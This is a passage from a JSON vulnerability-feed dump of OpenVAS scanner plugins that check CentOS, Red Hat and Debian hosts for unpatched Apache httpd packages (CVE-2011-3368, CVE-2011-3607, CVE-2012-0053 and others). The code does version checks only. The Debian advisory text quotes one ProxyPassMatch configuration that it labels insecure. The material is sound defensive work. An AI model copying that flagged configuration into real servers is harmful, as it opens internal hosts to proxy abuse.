Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The Apache HTTP Server is a popular web server.\n\n It was discovered that the fix for CVE-2011-3368 (released via\n RHSA-2011:1391) did not completely address the problem. An attacker could\n bypass the fix and make a reverse proxy connect to an arbitrary server not\n directly accessible to the attacker by sending an HTTP version 0.9 request,\n or by using a specially-crafted URI. (CVE-2011-3639, CVE-2011-4317)\n \n The httpd server included the full HTTP header line in the default error\n page generated when receiving an excessively long or malformed header.\n Malicious JavaScript running in the server's domain context could use this\n flaw to gain access to httpOnly cookies. (CVE-2012-0053)\n \n An integer overflow flaw, leading to a heap-based buffer overflow, was\n found in the way httpd performed substitutions in regular expressions. An\n attacker able to set certain httpd settings, such as a user permitted to\n override the httpd configuration for a specific directory using a\n ".htaccess" file, could use this flaw to crash the httpd child process or,\n possibly, execute arbitrary code with the privileges of the "apache" user.\n (CVE-2011-3607)\n \n A flaw was found in the way httpd handled child process status information.\n A malicious program running with httpd child process privileges (such as a\n PHP or CGI script) could use this flaw to cause the parent httpd process to\n crash during httpd service shutdown. (CVE-2012-0031)\n \n All httpd users should upgrade to these updated packages, which contain\n backported patches to correct these issues. After installing the updated\n packages, the httpd daemon will be restarted automatically.\";\n\ntag_affected = \"httpd on CentOS 6\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2012-February/018433.html\");\n script_id(881089);\n script_version(\"$Revision: 8249 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-27 07:29:56 +0100 (Wed, 27 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 16:05:13 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-3639\", \"CVE-2011-4317\", \"CVE-2012-0031\",\n \"CVE-2012-0053\", \"CVE-2011-3368\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name: \"CESA\", value: \"2012:0128\");\n script_name(\"CentOS Update for httpd CESA-2012:0128 centos6 \");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of httpd\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.15~15.el6.centos.1\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.15~15.el6.centos.1\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.15~15.el6.centos.1\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-tools\", rpm:\"httpd-tools~2.2.15~15.el6.centos.1\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.15~15.el6.centos.1\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-01-06T13:06:47", "bulletinFamily": "scanner", "description": "Check for the Version of httpd", "modified": "2018-01-05T00:00:00", "published": "2012-07-09T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=870631", "id": "OPENVAS:870631", "title": "RedHat Update for httpd RHSA-2012:0128-01", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for httpd RHSA-2012:0128-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The Apache HTTP Server is a popular web server.\n\n It was discovered that the fix for CVE-2011-3368 (released via\n RHSA-2011:1391) did not completely address the problem. An attacker could\n bypass the fix and make a reverse proxy connect to an arbitrary server not\n directly accessible to the attacker by sending an HTTP version 0.9 request,\n or by using a specially-crafted URI. (CVE-2011-3639, CVE-2011-4317)\n\n The httpd server included the full HTTP header line in the default error\n page generated when receiving an excessively long or malformed header.\n Malicious JavaScript running in the server's domain context could use this\n flaw to gain access to httpOnly cookies. (CVE-2012-0053)\n\n An integer overflow flaw, leading to a heap-based buffer overflow, was\n found in the way httpd performed substitutions in regular expressions. An\n attacker able to set certain httpd settings, such as a user permitted to\n override the httpd configuration for a specific directory using a\n ".htaccess" file, could use this flaw to crash the httpd child process or,\n possibly, execute arbitrary code with the privileges of the "apache" user.\n (CVE-2011-3607)\n\n A flaw was found in the way httpd handled child process status information.\n A malicious program running with httpd child process privileges (such as a\n PHP or CGI script) could use this flaw to cause the parent httpd process to\n crash during httpd service shutdown. (CVE-2012-0031)\n\n All httpd users should upgrade to these updated packages, which contain\n backported patches to correct these issues. After installing the updated\n packages, the httpd daemon will be restarted automatically.\";\n\ntag_affected = \"httpd on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2012-February/msg00029.html\");\n script_id(870631);\n script_version(\"$Revision: 8295 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-05 07:29:18 +0100 (Fri, 05 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-09 10:37:07 +0530 (Mon, 09 Jul 2012)\");\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-3639\", \"CVE-2011-4317\", \"CVE-2012-0031\", \"CVE-2012-0053\", \"CVE-2011-3368\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name: \"RHSA\", value: \"2012:0128-01\");\n script_name(\"RedHat Update for httpd RHSA-2012:0128-01\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of httpd\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.15~15.el6_2.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-debuginfo\", rpm:\"httpd-debuginfo~2.2.15~15.el6_2.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.15~15.el6_2.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-tools\", rpm:\"httpd-tools~2.2.15~15.el6_2.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.15~15.el6_2.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.15~15.el6_2.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-09-02T00:02:06", "bulletinFamily": "scanner", "description": "The remote host is missing an update to apache2\nannounced via advisory DSA 2405-1.", "modified": "2018-04-06T00:00:00", "published": "2012-02-13T00:00:00", "id": "OPENVAS:136141256231070724", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231070724", "title": "Debian Security Advisory DSA 2405-1 (apache2)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2405_1.nasl 9352 2018-04-06 07:13:02Z cfischer $\n# Description: Auto-generated from advisory DSA 2405-1 (apache2)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several vulnerabilities have been found in the Apache HTTPD Server:\n\nCVE-2011-3607:\n\nAn integer overflow in ap_pregsub() could allow local attackers to\nexecute arbitrary code at elevated privileges via crafted .htaccess\nfiles.\n\nCVE-2011-3368 CVE-2011-3639 CVE-2011-4317:\n\nThe Apache HTTP Server did not properly validate the request URI for\nproxied requests. In certain reverse proxy configurations using the\nProxyPassMatch directive or using the RewriteRule directive with the\n[P] flag, a remote attacker could make the proxy connect to an\narbitrary server. The could allow the attacker to access internal\nservers that are not otherwise accessible from the outside.\n\nThe three CVE ids denote slightly different variants of the same\nissue.\n\nNote that, even with this issue fixed, it is the responsibility of\nthe administrator to ensure that the regular expression replacement\npattern for the target URI does not allow a client to append arbitrary\nstrings to the host or port parts of the target URI. For example, the\nconfiguration\n\nProxyPassMatch ^/mail(.*) http://internal-host$1\n\nis still insecure and should be replaced by one of the following\nconfigurations:\n\nProxyPassMatch ^/mail(/.*) http://internal-host$1\nProxyPassMatch ^/mail/(.*) http://internal-host/$1\n\nCVE-2012-0031:\n\nAn apache2 child process could cause the parent process to crash\nduring shutdown. This is a violation of the privilege separation\nbetween the apache2 processes and could potentially be used to worsen\nthe impact of other vulnerabilities.\n\nCVE-2012-0053:\n\nThe response message for error code 400 (bad request) could be used to\nexpose httpOnly cookies. This could allow a remote attacker using\ncross site scripting to steal authentication cookies.\n\n\nFor the oldstable distribution (lenny), these problems have been fixed in\nversion apache2 2.2.9-10+lenny12.\n\nFor the stable distribution (squeeze), these problems have been fixed in\nversion apache2 2.2.16-6+squeeze6\n\nFor the testing distribution (wheezy), these problems will be fixed in\nversion 2.2.22-1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 2.2.22-1.\n\nWe recommend that you upgrade your apache2 packages.\";\ntag_summary = \"The remote host is missing an update to apache2\nannounced via advisory DSA 2405-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202405-1\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.70724\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-3368\", \"CVE-2011-3639\", \"CVE-2011-4317\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n script_version(\"$Revision: 9352 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:13:02 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-13 11:19:29 -0500 (Mon, 13 Feb 2012)\");\n script_name(\"Debian Security Advisory DSA 2405-1 (apache2)\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"apache2\", ver:\"2.2.9-10+lenny12\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-dbg\", ver:\"2.2.9-10+lenny12\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-doc\", ver:\"2.2.9-10+lenny12\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-event\", ver:\"2.2.9-10+lenny12\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-prefork\", ver:\"2.2.9-10+lenny12\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-worker\", ver:\"2.2.9-10+lenny12\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-prefork-dev\", ver:\"2.2.9-10+lenny12\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-src\", ver:\"2.2.9-10+lenny12\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-suexec\", ver:\"2.2.9-10+lenny12\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-suexec-custom\", ver:\"2.2.9-10+lenny12\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-threaded-dev\", ver:\"2.2.9-10+lenny12\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-utils\", ver:\"2.2.9-10+lenny12\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2.2-common\", ver:\"2.2.9-10+lenny12\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-dbg\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-doc\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-event\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-itk\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-prefork\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-worker\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-prefork-dev\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-suexec\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-suexec-custom\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-threaded-dev\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-utils\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2.2-bin\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2.2-common\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2\", ver:\"2.2.22-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-dbg\", ver:\"2.2.22-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-doc\", ver:\"2.2.22-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-event\", ver:\"2.2.22-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-itk\", ver:\"2.2.22-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-prefork\", ver:\"2.2.22-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-worker\", ver:\"2.2.22-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-prefork-dev\", ver:\"2.2.22-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-suexec\", ver:\"2.2.22-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-suexec-custom\", ver:\"2.2.22-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-threaded-dev\", ver:\"2.2.22-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-utils\", ver:\"2.2.22-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2.2-bin\", ver:\"2.2.22-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2.2-common\", ver:\"2.2.22-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-09-02T00:02:01", "bulletinFamily": "scanner", "description": "Check for the Version of httpd", "modified": "2018-04-06T00:00:00", "published": "2012-07-30T00:00:00", "id": "OPENVAS:1361412562310881089", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881089", "title": "CentOS Update for httpd CESA-2012:0128 centos6 ", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for httpd CESA-2012:0128 centos6 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The Apache HTTP Server is a popular web server.\n\n It was discovered that the fix for CVE-2011-3368 (released via\n RHSA-2011:1391) did not completely address the problem. An attacker could\n bypass the fix and make a reverse proxy connect to an arbitrary server not\n directly accessible to the attacker by sending an HTTP version 0.9 request,\n or by using a specially-crafted URI. (CVE-2011-3639, CVE-2011-4317)\n \n The httpd server included the full HTTP header line in the default error\n page generated when receiving an excessively long or malformed header.\n Malicious JavaScript running in the server's domain context could use this\n flaw to gain access to httpOnly cookies. (CVE-2012-0053)\n \n An integer overflow flaw, leading to a heap-based buffer overflow, was\n found in the way httpd performed substitutions in regular expressions. An\n attacker able to set certain httpd settings, such as a user permitted to\n override the httpd configuration for a specific directory using a\n ".htaccess" file, could use this flaw to crash the httpd child process or,\n possibly, execute arbitrary code with the privileges of the "apache" user.\n (CVE-2011-3607)\n \n A flaw was found in the way httpd handled child process status information.\n A malicious program running with httpd child process privileges (such as a\n PHP or CGI script) could use this flaw to cause the parent httpd process to\n crash during httpd service shutdown. (CVE-2012-0031)\n \n All httpd users should upgrade to these updated packages, which contain\n backported patches to correct these issues. After installing the updated\n packages, the httpd daemon will be restarted automatically.\";\n\ntag_affected = \"httpd on CentOS 6\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2012-February/018433.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881089\");\n script_version(\"$Revision: 9352 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:13:02 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 16:05:13 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-3639\", \"CVE-2011-4317\", \"CVE-2012-0031\",\n \"CVE-2012-0053\", \"CVE-2011-3368\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name: \"CESA\", value: \"2012:0128\");\n script_name(\"CentOS Update for httpd CESA-2012:0128 centos6 \");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of httpd\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.15~15.el6.centos.1\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.15~15.el6.centos.1\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.15~15.el6.centos.1\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-tools\", rpm:\"httpd-tools~2.2.15~15.el6.centos.1\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.15~15.el6.centos.1\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-11-23T15:16:27", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2012-07-09T00:00:00", "id": "OPENVAS:1361412562310870631", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870631", "title": "RedHat Update for httpd RHSA-2012:0128-01", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for httpd RHSA-2012:0128-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2012-February/msg00029.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870631\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-09 10:37:07 +0530 (Mon, 09 Jul 2012)\");\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-3639\", \"CVE-2011-4317\", \"CVE-2012-0031\", \"CVE-2012-0053\", \"CVE-2011-3368\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name:\"RHSA\", value:\"2012:0128-01\");\n script_name(\"RedHat Update for httpd RHSA-2012:0128-01\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'httpd'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_6\");\n script_tag(name:\"affected\", value:\"httpd on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"The Apache HTTP Server is a popular web server.\n\n It was discovered that the fix for CVE-2011-3368 (released via\n RHSA-2011:1391) did not completely address the problem. An attacker could\n bypass the fix and make a reverse proxy connect to an arbitrary server not\n directly accessible to the attacker by sending an HTTP version 0.9 request,\n or by using a specially-crafted URI. (CVE-2011-3639, 